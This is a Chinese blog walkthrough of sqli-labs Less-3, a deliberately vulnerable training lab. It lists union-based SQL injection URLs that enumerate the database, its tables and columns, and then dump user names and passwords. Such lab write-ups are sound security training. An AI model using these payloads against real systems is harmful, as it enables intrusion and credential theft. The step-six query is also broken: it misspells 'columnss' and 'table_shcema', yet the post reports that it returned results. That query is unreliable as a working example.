sql-lbas闯关-第三关

最新推荐文章于 2024-05-22 00:19:20 发布
最新推荐文章于 2024-05-22 00:19:20 发布
阅读量353 收藏 3
点赞数
分类专栏: 靶场闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41705627/article/details/104734531
版权

第三关

第一步 判断注入类型:

1. 根据第三关的提示可以看出,这关的注入类型是:**单引号和单括号** 型注入

在这里插入图片描述

第二步 判断有几个字段位可显示数据

输入:

http://localhost/sqli/Less-3/?id=1') order by 3 --+

依次从1开始替换 ‘3’ 的数值,发现输入4的时候报错,而3正确,说明最大有3位字段可显示数据,正确结果如下图所示:
在这里插入图片描述

第三步 判断可显示数据的是哪几位

输入:(查询出来的结果就是可以显示数据的字段位)

ps:这里的数据是“-1”而不是“1”,因为1是正常数字会占用显示位置;只写到3是因为第二步查询出来只有3个数据显示位
http://localhost/sqli/Less-3/?id=-1') union select 1,2,3 --+

根据查询结果可知,能被我们看到的数据显示位只有 2 和 3
在这里插入图片描述

第四步 爆数据库名

输入:

ps:要在第三步中查询到可显示数据的位置处去显示,否则结果我们看不到
http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3 --+

得到数据库名为:security
在这里插入图片描述

第五步 爆表名

输入:

http://localhost/sqli/Less-3/?id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

得到数据库security中有4张表,分别为:emails、referers、uagents、users
在这里插入图片描述

information_schema是标准表,是搭建sql-labs环境时导入数据库时的默认表;
group_concat()是将多个结果以一个结果形式显示,结果中间用逗号隔开;
table_name代表要查询表名
table_shema代表数据库名,后面接指定的数据库名的名字,或直接用database()代替

第六步 爆字段名

输入:(这里我们还是查询的是users表)

http://localhost/sqli/Less-3/?id=-1') union select 1,database(),(select group_concat(column_name) from information_schema.columnss where table_shcema="security" and table_name="users") --+

得到users表中有3个字段,分别为:id、username、password
在这里插入图片描述

第七步 爆数据

输入:(这里我们选择姓名和密码两个字段来爆;2号位置放姓名,3号位置放密码)

http://localhost/sqli/Less-3/?id=-1') union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+

得到第一行数据为用户名;第二行为对应用户的密码(例如:用户Dumb的密码为:Dumb)
在这里插入图片描述

幼稚鬼&海南仙女
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2248
sqli第三关简要步骤
sqli-lib64闯关笔记学习资料.zip
08-22
SQL注入(SQL Injection)是一种常见的网络安全威胁,针对的是使用动态SQL语句的Web应用程序。sqli-lib64是一个专门设计的在线平台,用于帮助开发者和安全爱好者学习和实践SQL注入技术。这个卡挑战提供了65个不同...
Sqli-libs通详解__第三关
henghengzhao_的博客
10-06 634
sqli-libs通详解,一看就会,超详细
sqli-labs---第三关
最新发布
2201_75556700的博客
05-22 562
6、查询users表中字段名(查看到了敏感字段id,username,password)id=1' (报错:''1'') LIMIT 0,1')id=1') order by 3 --+ (没有报错)3、使用联合查询查看回显位置(面为错可以执行后面的)id=1') order by 4 --+ (报错)5、查询表名(一共爆出四张表,查看敏感表users)7、查看字段username和password的信息。4、查询数据库名(security)id=1'' 正常显示。1、判断什么类型注入。
sqli-labs第三关
TA不懒,但还没有添加简介
09-07 765
文章目录总结 第三关找到注入点的时候发现会发现在"1"处右边多了个右括号 构造一下sql语句 select 1,2,3 from table where id=('$id') 所以需要在1’后面增加一个")" 然后使用order by 或者select 判断字段个数 然后和第一第二一样 第一二详细 总结 和不同的是注入点有所改变,需要思考并构造语句。 ...
Sqli-labs靶场第3详解[Sqli-labs-less-3]
m0_73615178的博客
02-19 537
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQLI-labs-第三关
weixin_54055099的博客
08-30 409
SQLI第三关的思路
SQLSQL-92,SQL-99和SQL-2003的BNF语法
01-30
SQL-92、SQL-99和SQL-2003是SQL标准的三个重要版本,分别在1992年、1999年和2003年由国际标准化组织(ISO)发布,它们在SQL语法和功能上进行了多次扩展和改进。 SQL-92是SQL的第一个正式标准,它为SQL提供了更严谨...
SQL-Front 5.3
04-07
三、SQL-Front 5.3的实际应用 1. 数据库查询与管理:通过SQL-Front,用户可以方便地创建、修改和执行SQL查询,查看和编辑数据库中的记录,进行数据的增删改查操作。 2. 数据库备份与恢复:支持数据库的备份和恢复...
sql-formatter npm打包后文件
12-14
1、本资源已经对源码NPM工程打包为sql-formatter.min.js 文件可直接引入使用 2、具体说明可见下载后压缩包中的 说明.text 文件 3、相博客文章 https://blog.csdn.net/guzuoi/article/details/111151290
x-pack-sql-jdbc-6.5.4.jar
01-22
x-pack-sql-jdbc-6.5.4.jar
sqli-labs-master之第三关
weixin_66387649的博客
02-28 537
sqli-labs-master第三关详解
sqli-labs 通笔记第三关
m0_66169375的博客
04-23 510
id=1') order by 4 --+ 回显错误,说明最大有3个字段可显示数据。1,判断注入类型:根据提示看出这的注入类型是**单引号和单括号**型注入。id=1') and 1=2 回显出错误。3,使用union select 1,2,3 联合查询有几个显示位。id=1') order by 3 --+ 回显正常。id=1') and 1=1 --+回显正常。此处是-1而不是1,因为1是正常数字会占用显示位置。,回显可知,能看到的数据显示位只有2,3。5,爆破出数据库内的数据库名。
【less-3】sqli-labs靶场第三关
未名编程
07-19 346
网址 https://sqli.wmcoder.site/sqli-labs/Less-3/ 解法 与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二 不同的是,根据错误回显知道,其拼接方式为id=('$id') 故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1') 采用如下语句获取所有用户名和密码 https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 unio
sqli-labs靶场第三关
gou1791241251的博客
12-19 1402
传入id=1查看回显 第一步:判断是数字型注入还是字符型注入 输入单引号页面异常,输入双引号页面正常显示。但是从回显的信息看来,它是由’)来进行闭合的,所以我们尝试输入’)进行闭合再输入–+注释掉后面的代码,结果显示页面正常显示。由此可推出参数是’)进行闭合的!此时可以输入and 1=1 和and 1=2来比较 此时证明了上述假设的闭合方式 现在我们可以用order by 来进行判断此表有多少个字段啦! order by 3正常 ; order by 4异常。说明有3个字段. 使用联合
【如何成为SQL高手】第三关:索引及维护
IT邦德
01-31 3238
第三关:索引及维护
sqli-labs实战记录(三)
0verWatch的博客
08-29 284
Less-38 从这一开始其实就是堆叠注入,就是用分号连接两个不同的语句,然后执行这几条语句,进行增删改查,但是比赛中是不大会用的,但是对于这几个环境我还是偏向union注入所以我还是以union注入的方式显示 换了mysqli的连接方式,但是换汤不换药 直接单引号闭合就好了 http://192.168.100.103/sqlilabs/Less-38/?id=-1' union ...
sqli靶场学习记录-第三关
qq_50744304的博客
08-03 172
第三关面两没有太大的区别,只是数据访问的方式不一样。
sql-lab第42
07-28
抱歉,我没有找到sql-lab第42的引用内容。可能这个卡的信息不在提供的引用中。如果你有其他问题,我会尽力回答。 #### 引用[.reference_title] - *1* *3* [sql-labs 闯关 21~25](https://blog.csdn.net/qq_44663230/article/details/126386401)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sql-lab(ALL 1-65)](https://blog.csdn.net/lee_maple/article/details/123363445)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值